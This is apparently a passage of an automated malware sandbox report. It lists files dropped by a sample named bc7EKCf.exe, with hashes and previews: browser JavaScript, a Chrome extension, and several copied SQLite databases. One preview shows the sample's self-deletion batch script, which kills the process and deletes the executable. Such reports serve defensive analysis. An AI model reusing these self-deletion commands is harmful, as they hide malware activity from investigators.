                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):122218
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                                                  MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                                                  SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                                                  SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                                                                  SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):291
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                                                  MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                                                  SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                                                  SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                                                  SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):130866
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                                                  MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                                                  SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                                                  SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                                                  SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):154477
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                                  MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                                  SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                                  SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                                  SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                                  Size (bytes):104
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.140074997229217
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:HFTEOuMJcFK1shFalwBRZDEXEPt+WfWHFguTZn:yOuMJZtlweowvlrTZn
                                                                                                                                                                                                                                                                                                                  MD5:0D30D01EFA92477A4504780C2A70BBE3
                                                                                                                                                                                                                                                                                                                  SHA1:2D267E0D1A295C799ABB1CF9950E41082AB00370
                                                                                                                                                                                                                                                                                                                  SHA-256:EB5032D32CADBE23F8F1129FB5D1B6D87AB1EFB07D95180C892F70B3EE9F494E
                                                                                                                                                                                                                                                                                                                  SHA-512:D77F25B7F9BB0B22BB666D5760BB1F2B1893049E635F215227FFA1B392164A39637EBE2C8F2BEB4D2F10056B31CF01DA9A205045FE3862EB82987CDFF86A8594
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:chcp 65001..TaskKill /F /PID 7536..Timeout /T 2 /Nobreak..Del /ah "C:\Users\user\Desktop\bc7EKCf.exe"..
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):5242880
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                                                                                                                  MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                                                                                                                  SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                                                                                                                  SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                                                                                                                  SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):98304
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                                                  MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                                                  SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                                                  SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                                                  SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):5242880
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                                                                                                                  MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                                                                                                                  SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                                                                                                                  SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                                                                                                                  SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 89, cookie 0x66, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):184320
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0671890745553332
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:QSqzWMMUfTNnGCTjHbRJkkqtXaWTK+hGgH+6e7EHVumYmcDn6:QrzWMffxnzkkqtXnTK+hNH+5EVumg
                                                                                                                                                                                                                                                                                                                  MD5:7AF64EAF9078C14DEA4E95EC0B3D4D82
                                                                                                                                                                                                                                                                                                                  SHA1:EF8FF9322AF503147ED8DE89C4C112E99E71E60E
                                                                                                                                                                                                                                                                                                                  SHA-256:BE3A8947800CDE9359470228186EA1EEA5629F94C6E833E862E2DB9820E9D9E1
                                                                                                                                                                                                                                                                                                                  SHA-512:4B96C72827847DC3108D09D9E782017274AB20FAD9F6F4EAB42EA55EDA3B8A6269991E74CF21507FB5CEF4453B53F9D2F51C4AB077380E2CAC9FF395380EF943
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......Y...........f......................................................j............O........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 89, cookie 0x66, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):184320
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0671890745553332
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:QSqzWMMUfTNnGCTjHbRJkkqtXaWTK+hGgH+6e7EHVumYmcDn6:QrzWMffxnzkkqtXnTK+hNH+5EVumg
                                                                                                                                                                                                                                                                                                                  MD5:7AF64EAF9078C14DEA4E95EC0B3D4D82
                                                                                                                                                                                                                                                                                                                  SHA1:EF8FF9322AF503147ED8DE89C4C112E99E71E60E
                                                                                                                                                                                                                                                                                                                  SHA-256:BE3A8947800CDE9359470228186EA1EEA5629F94C6E833E862E2DB9820E9D9E1
                                                                                                                                                                                                                                                                                                                  SHA-512:4B96C72827847DC3108D09D9E782017274AB20FAD9F6F4EAB42EA55EDA3B8A6269991E74CF21507FB5CEF4453B53F9D2F51C4AB077380E2CAC9FF395380EF943
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......Y...........f......................................................j............O........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 28, cookie 0x1d, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):57344
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.863060653641558
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:u7/KLPeymOT7ynlm+yKwt7izhGnvgbn8MouB6wznP:u74CnlmVizhGE7IwD
                                                                                                                                                                                                                                                                                                                  MD5:C681C90B3AAD7F7E4AF8664DE16971DF
                                                                                                                                                                                                                                                                                                                  SHA1:9F72588CEA6569261291B19E06043A1EFC3653BC
                                                                                                                                                                                                                                                                                                                  SHA-256:ADB987BF641B2531991B8DE5B10244C3FE1ACFA7AD7A61A65D2E2D8E7AB34C1D
                                                                                                                                                                                                                                                                                                                  SHA-512:4696BF334961E4C9757BAC40C41B4FBE3E0B9F821BD242CE6967B347053787BE54D1270D7166745126AFA42E8193AC2E695B0D8F11DE8F0B2876628B7C128942
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 39, 1st free page 10, free pages 4, cookie 0x45, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.5241404324800358
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:56U+bGzPDLjGQLBE3up+U0jBo4tgi3JMe9xJDECVjN:5R+GPXBBE3upb0HtTTDxVj
                                                                                                                                                                                                                                                                                                                  MD5:241322143A01979D346689D9448AC8C0
                                                                                                                                                                                                                                                                                                                  SHA1:DD95F97EE1CCB8FD9026D2156DE9CB8137B816D1
                                                                                                                                                                                                                                                                                                                  SHA-256:65EEBDEC4F48A111AC596212A1D71C3A5CFA996797500E5344EEABDFA02527C8
                                                                                                                                                                                                                                                                                                                  SHA-512:9C7241462A9DADEF25D8EEB1C14BABFBA65C451EBAFBC068B9856E4EF0EB6F894A44686CBB0D1F46C7F546335D0C53A3E386E6C1A017082DE127F8F9C0A54BD2
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......'...........E......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 39, 1st free page 10, free pages 4, cookie 0x45, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.5241404324800358
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:56U+bGzPDLjGQLBE3up+U0jBo4tgi3JMe9xJDECVjN:5R+GPXBBE3upb0HtTTDxVj
                                                                                                                                                                                                                                                                                                                  MD5:241322143A01979D346689D9448AC8C0
